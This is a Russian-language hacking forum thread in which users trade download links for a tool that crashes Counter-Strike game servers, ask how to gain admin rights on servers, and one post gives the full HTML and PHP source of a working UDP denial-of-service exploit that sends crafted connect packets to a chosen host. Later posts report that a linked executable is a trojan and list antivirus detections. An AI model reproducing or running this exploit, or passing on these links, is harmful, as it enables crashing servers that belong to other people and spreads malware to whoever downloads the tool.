Counter-Strike Dos exploit

Discussion in 'Уязвимости' started by gemaglabin, 26 Sep 2006.

  1. ssk.ex0.uf0

    ssk.ex0.uf0 Elder - Старейшина

    Joined:
    27 Feb 2007
    Messages:
    68
    Likes Received:
    19
    Reputations:
    0
    Как для чего? вот бывает такое что один за одним хэд шот...а тут тя раз и модер какой нить банит... :cool:
    ЗЫ не поверите...немогу найти exe'шник...посеял...если у кого остался...очень прошу поделиться...фаловый хост любой подойдёт...
     
  2. espe2k

    espe2k New Member

    Joined:
    9 Mar 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    http://anonymous.h17.ru/CSHack.exe

    Ух, завалил несчастный сервер местного КСера... :rolleyes:

    сплоит +1
     
  3. ssk.ex0.uf0

    ssk.ex0.uf0 Elder - Старейшина

    Joined:
    27 Feb 2007
    Messages:
    68
    Likes Received:
    19
    Reputations:
    0
    http://anonymous.h17.ru/CSHack.exe
    По этому линку немогу скачать...
    Если у кого есть возможность залить\перезалить...буду благодарен...
     
  4. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    --http://ice1k.info/files/cshack.exe
     
    3 people like this.
  5. SHaDoW[RF]

    SHaDoW[RF] New Member

    Joined:
    23 Dec 2006
    Messages:
    19
    Likes Received:
    1
    Reputations:
    0
    а как узнать пасс?
     
  6. Darkweider

    Darkweider Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    142
    Likes Received:
    13
    Reputations:
    0
    Убивает сервак насмерть=)
     
  7. Eng1nE

    Eng1nE Elder - Старейшина

    Joined:
    18 Feb 2007
    Messages:
    23
    Likes Received:
    47
    Reputations:
    2
    Вопрос а есть какой-нибудь метод полу4ить админские права на серваке? Такой
    путь cstrike\addons\amxmodx\configs\users.ini. Там можно добавить админа. Кроме трояна и др. Есть соображения по этому поводу?))
     
  8. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    Есть...можно выпить пивка или накурица с админом, мб скажет пасс или даст админа даже =)
     
  9. gold-goblin

    gold-goblin Elder - Старейшина

    Joined:
    26 Mar 2007
    Messages:
    918
    Likes Received:
    172
    Reputations:
    3
    выложите пожалуйста еще раз этот чуда ехе
     
  10. Don1=2

    Don1=2 Member

    Joined:
    10 Sep 2007
    Messages:
    0
    Likes Received:
    51
    Reputations:
    -19
    это случайно не с красненькой иконкой, который коннектится вначале под ником Born to be pig... ? и только со второго раза кладёт сервак?
     
  11. gold-goblin

    gold-goblin Elder - Старейшина

    Joined:
    26 Mar 2007
    Messages:
    918
    Likes Received:
    172
    Reputations:
    3
    Вроде он
     
  12. Lomaka

    Lomaka New Member

    Joined:
    19 Apr 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    На сколько я понимаю, сплойты и экзешник валят Nosteam сервера, а для Steam есть какой-нить сплойт или экзешник?
     
  13. Don1=2

    Don1=2 Member

    Joined:
    10 Sep 2007
    Messages:
    0
    Likes Received:
    51
    Reputations:
    -19
    /me пацталом.... нет. есть тока .txt сплоит... его надо вставлять вместо имени и коннактицо
     
  14. inlanger

    inlanger Elder - Старейшина

    Joined:
    7 Jan 2007
    Messages:
    1,009
    Likes Received:
    286
    Reputations:
    27
    перевыложите куда-нить...а то все ссылки битые.
     
  15. kLAZE

    kLAZE New Member

    Joined:
    13 Dec 2007
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Никак. Ибо спроси у админа =))
     
  16. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    а есть ещё актуальные сплойты под кс?
     
  17. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    и те старые еще актуальны, но не на всех сервах

    большое спасибо ребята за работу!!
     
  18. DCRM

    DCRM Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    67
    Likes Received:
    27
    Reputations:
    -1
    [​IMG]
    Попробуй тут скачать:
    >>DownLoad<<

    Ещё нашёл сплоит...
    1я часть:
    Code:
    <html>
    <head>
    <title>PHP Counter Strike DOS Poc</title>
    
    <style type="text/css">
    
    input {
    width: 150px;
    }
    
    td {
    font-size: 12px;
    font-family: Verdana, "Trebuchet MS";
    text-align: left;
    }
    
    span.err {
    color: red;
    }
    
    span.ok {
    color: green;
    }
    
    </style>
    
    </head>
    
    <body onload="checkpass()">
    
    <div style="width: 210px; margin: auto;">
    <form name="csform" method="post" action="cs.php">
    
    <table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
    <tr>
    <td style="width: 50px;">Host</td>
    <td colspan="2"><input name="host" type="text" value=""/></td>
    </tr>
    
    <tr>
    <td>Port</td>
    <td colspan="2"><input name="port" type="text" value=""/></td>
    </tr>
    
    <tr>
    <td>&nbsp;</td>
    <td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
    <td>Auth Type 2</td>
    </tr>
    
    <tr>
    <td>Pass</td>
    <td colspan="2"><input name="pass" type="text" value="" /></td>
    </tr>
    
    
    <tr>
    <td>&nbsp;</td>
    <td colspan="2"><input type="submit" Value="Run"/></td>
    </tr>
    
    
    </table>
    <br/>
    </form>
    </div>
    <center>Written by gemaglabin.Bug was found by .FUF.Thx 2 Sax-mmS<br>
    </body>
    </html>
    2я часть
    PHP:
    <?php

    /*
    CS-dos exploit made by gemaglabin
    Bug was discovered by .FUF # 111596
    Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
    underwater.cup.su
    */

    ini_set("display_errors","0");

    function 
    HELLO_PACKET()
    {
    $packet pack("H*","FFFFFFFF");
    $packet .= "TSource Engine Query";
    $packet .= pack("H*","00");
    return 
    $packet;
    }

    function 
    CHALLENGE_PACKET()
    {
    $packet pack("H*","FFFFFFFF");
    $packet .= "getchallenge valve";
    $packet .= pack("H*","00");
    return 
    $packet;
    }

    function 
    LOGIN_PACKET_4()
    {
    global 
    $cookie;
    global 
    $password;
    $packet pack("H*","FFFFFFFF");
    $packet .= "connect 47 ";
    $packet .= $cookie.' "';
    $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
    $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
    $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
    $packet .= 'word\\'.$password;
    $packet .= pack("H*","220A0000EE02");
    return 
    $packet;
    }

    function 
    LOGIN_PACKET_2()
    {
    global 
    $cookie;
    global 
    $password;
    $packet pack("H*","FFFFFFFF");
    $packet .= "connect 47 ";
    $packet .= $cookie.' "';
    $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
    $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
    $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
    $packet .= 'word\\'.$password;
    $packet .= pack("H*","22");
    return 
    $packet;
    }

    function 
    dowork($host,$port,$password,$auth)
    {
    global 
    $password;
    global 
    $cookie;
    # connecting to target host
    $fsock fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
    if (!
    $fsock) die ($errstr);
    else
    {
    # sending hello packet
    fwrite ($fsock,HELLO_PACKET());
    fread ($fsock,100);
    # sending chalennge packet
    fwrite ($fsock,CHALLENGE_PACKET());
    # recieving cookies
    $resp fread($fsock,100);
    # grab cookies from packet
    $cookie substr($resp,strpos($resp,"A00000000")+10);
    $cookie substr($cookie,0,strpos($cookie," "));
    # sending login packet
    if (!$authfwrite $fsock,LOGIN_PACKET_4());else fwrite $fsock,LOGIN_PACKET_2());
    $resp fread($fsock,100);
    }
    }

    IF (isset(
    $_POST['host']) && isset($_POST['port']))
    {
    IF (empty(
    $_POST['pass'])) $password "123";
    else 
    $password $_POST['pass'];
    $fserver $_POST['host'];
    $fport $_POST['port'];
    if (isset(
    $_POST['auth'])) $fauth true;else $fauth=false;
    # we have to connect 2 times
    $result dowork($fserver,$fport,$password,$fauth);
    $result dowork($fserver,$fport,$password,$fauth);
    # parsing result
    echo "Exploit Sent";
    }
    ?>
     
    #58 DCRM, 10 Feb 2008
    Last edited: 10 Feb 2008
  19. Витян

    Витян Elder - Старейшина

    Joined:
    25 Dec 2006
    Messages:
    190
    Likes Received:
    83
    Reputations:
    14
    по твоей ссылке троян
     
  20. DCRM

    DCRM Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    67
    Likes Received:
    27
    Reputations:
    -1
    Хм... я всего лишь выцепил её из Гугля, НОД, Каспер и DrWeb молчали... хотя что ты хочешь ожидать от такой проги то)
    Code:
    Антивирус 	Версия 	Обновление 	Результат
    AhnLab-V3 	2008.2.4.10 	2008.02.04 	-
    AntiVir 	7.6.0.62 	2008.02.04 	TR/Agent.act.2
    Authentium 	4.93.8 	2008.02.04 	-
    Avast 	4.7.1098.0 	2008.02.03 	Win32:Agent-PJA
    AVG 	7.5.0.516 	2008.02.04 	Generic6.WSG
    BitDefender 	7.2 	2008.02.04 	Trojan.Generic.15882
    CAT-QuickHeal 	9.00 	2008.02.04 	-
    ClamAV 	0.92 	2008.02.04 	-
    DrWeb 	4.44.0.09170 	2008.02.04 	-
    eSafe 	7.0.15.0 	2008.01.28 	suspicious Trojan/Worm
    eTrust-Vet 	31.3.5509 	2008.02.04 	-
    Ewido 	4.0 	2008.02.04 	-
    FileAdvisor 	1 	2008.02.04 	High threat detected
    Fortinet 	3.14.0.0 	2008.02.04 	Grayware
    F-Prot 	4.4.2.54 	2008.02.03 	-
    F-Secure 	6.70.13260.0 	2008.02.04 	-
    Ikarus 	T3.1.1.20 	2008.02.04 	Trojan.Win32.Agent.act
    Kaspersky 	7.0.0.125 	2008.02.04 	-
    McAfee 	5222 	2008.02.04 	-
    Microsoft 	1.3204 	2008.02.04 	-
    NOD32v2 	2847 	2008.02.04 	-
    Norman 	5.80.02 	2008.02.04 	-
    Panda 	9.0.0.4 	2008.02.04 	Trj/Downloader.MDW
    Prevx1 	V2 	2008.02.04 	Generic.Malware
    Rising 	20.29.22.00 	2008.01.30 	-
    Sophos 	4.26.0 	2008.02.04 	Mal/Generic-A
    Sunbelt 	2.2.907.0 	2008.02.02 	-
    Symantec 	10 	2008.02.04 	Trojan Horse
    TheHacker 	6.2.9.208 	2008.02.04 	-
    VBA32 	3.12.6.0 	2008.02.03 	Trojan.Win32.Agent.act
    VirusBuster 	4.3.26:9 	2008.02.04 	-
    Webwasher-Gateway 	6.6.2 	2008.02.04 	Trojan.Agent.act.2
    p.s. А скрин то я с этого exe делал... ну да ладно)
     
    #60 DCRM, 11 Feb 2008
    Last edited: 11 Feb 2008
Loading...